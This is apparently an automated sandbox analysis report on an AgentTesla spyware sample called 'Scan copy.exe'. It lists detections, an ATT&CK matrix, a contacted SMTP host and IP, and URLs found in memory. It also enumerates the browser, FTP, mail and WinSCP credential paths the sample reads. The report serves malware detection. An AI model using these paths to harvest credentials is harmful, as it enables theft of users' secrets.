                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Users\user\Desktop\Scan copy.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Scan copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.467056763.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.228452111.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.Scan copy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3dd5270.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3dd5270.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.Scan copy.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3cb87f0.1.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.467056763.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.228452111.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 6048, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 5988, type: MEMORY
                      Source: Yara matchFile source: 7.2.Scan copy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3dd5270.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3dd5270.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.Scan copy.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3cb87f0.1.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\Scan copy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\Scan copy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara matchFile source: 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 5988, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.467056763.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.228452111.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.Scan copy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3dd5270.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3dd5270.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.Scan copy.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3cb87f0.1.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.467056763.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.228452111.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 6048, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 5988, type: MEMORY
                      Source: Yara matchFile source: 7.2.Scan copy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3dd5270.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3dd5270.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.Scan copy.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Scan copy.exe.3cb87f0.1.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture21System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSSecurity Software Discovery321Distributed Component Object ModelInput Capture21Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion141Cached Domain CredentialsVirtualization/Sandbox Evasion141VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Scan copy.exe17%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                      Scan copy.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\emmrGOU.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\emmrGOU.exe17%ReversingLabsByteCode-MSIL.Spyware.Negasteal

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.Scan copy.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      7.0.Scan copy.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://www.founder.com.cn/cnQ0%Avira URL Cloudsafe
                      http://www.fontbureau.comI.TTF0%URL Reputationsafe
                      http://www.fontbureau.comI.TTF0%URL Reputationsafe
                      http://www.fontbureau.comI.TTF0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.sajatypeworks.comr-t0%Avira URL Cloudsafe
                      http://www.tiro.com%Q0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/siv0%Avira URL Cloudsafe
                      http://smtp.atlmexco.com0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htmTP0%Avira URL Cloudsafe
                      http://www.sakkal.comx0%Avira URL Cloudsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cnn0%URL Reputationsafe
                      http://www.founder.com.cn/cnn0%URL Reputationsafe
                      http://www.founder.com.cn/cnn0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
                      http://www.fontbureau.comcom0%URL Reputationsafe
                      http://www.fontbureau.comcom0%URL Reputationsafe
                      http://www.fontbureau.comcom0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/.0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/.0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/.0%URL Reputationsafe
                      http://www.fontbureau.comionmy0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                      http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                      http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                      http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.fontbureau.comalic$0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/$0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/$0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/$0%URL Reputationsafe
                      http://www.urwpp.de0%URL Reputationsafe
                      http://www.urwpp.de0%URL Reputationsafe
                      http://www.urwpp.de0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://uZoqoU.com0%Avira URL Cloudsafe
                      http://www.fontbureau.comalsd0%URL Reputationsafe
                      http://www.fontbureau.comalsd0%URL Reputationsafe
                      http://www.fontbureau.comalsd0%URL Reputationsafe
                      http://www.galapagosdesign.com/0%URL Reputationsafe
                      http://www.galapagosdesign.com/0%URL Reputationsafe
                      http://www.galapagosdesign.com/0%URL Reputationsafe
                      http://www.sakkal.com(.0%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.fontbureau.comF0%URL Reputationsafe
                      http://www.fontbureau.comF0%URL Reputationsafe
                      http://www.fontbureau.comF0%URL Reputationsafe
                      http://www.agfamonotype.0%URL Reputationsafe
                      http://www.agfamonotype.0%URL Reputationsafe
                      http://www.agfamonotype.0%URL Reputationsafe
                      http://www.fontbureau.comascC0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      smtp.atlmexco.com
                      		93.89.24.35
                      		truetrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1Scan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designersGScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cnQScan copy.exe, 00000000.00000003.205522633.0000000005C76000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.comI.TTFScan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/?Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comr-tScan copy.exe, 00000000.00000003.201854697.0000000005C73000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers?Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                              		high
                              http://www.tiro.com%QScan copy.exe, 00000000.00000003.203905958.0000000005C8B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://www.tiro.comScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/sivScan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://smtp.atlmexco.comScan copy.exe, 00000007.00000002.475024688.0000000003331000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                		high
                                http://www.goodfont.co.krScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmTPScan copy.exe, 00000000.00000003.212350163.0000000005C83000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sakkal.comxScan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssScan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.sajatypeworks.comScan copy.exe, 00000000.00000003.201854697.0000000005C73000.00000004.00000001.sdmp, Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cTheScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnnScan copy.exe, 00000000.00000003.204490000.0000000005C7E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp//Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comcomScan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-jones.html2UScan copy.exe, 00000000.00000003.209057239.0000000005C89000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/.Scan copy.exe, 00000000.00000003.207626091.0000000005C75000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.comionmyScan copy.exe, 00000000.00000002.235863544.0000000005C70000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/Y0Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.ascendercorp.com/typedesigners.htmlScan copy.exe, 00000000.00000003.208021704.0000000005CB6000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fonts.comScan copy.exe, 00000000.00000003.202582104.0000000005C8B000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comalic$Scan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.jiyu-kobo.co.jp/$Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deScan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScan copy.exe, 00000000.00000002.226113577.0000000002BD1000.00000004.00000001.sdmpfalse
                                        		high
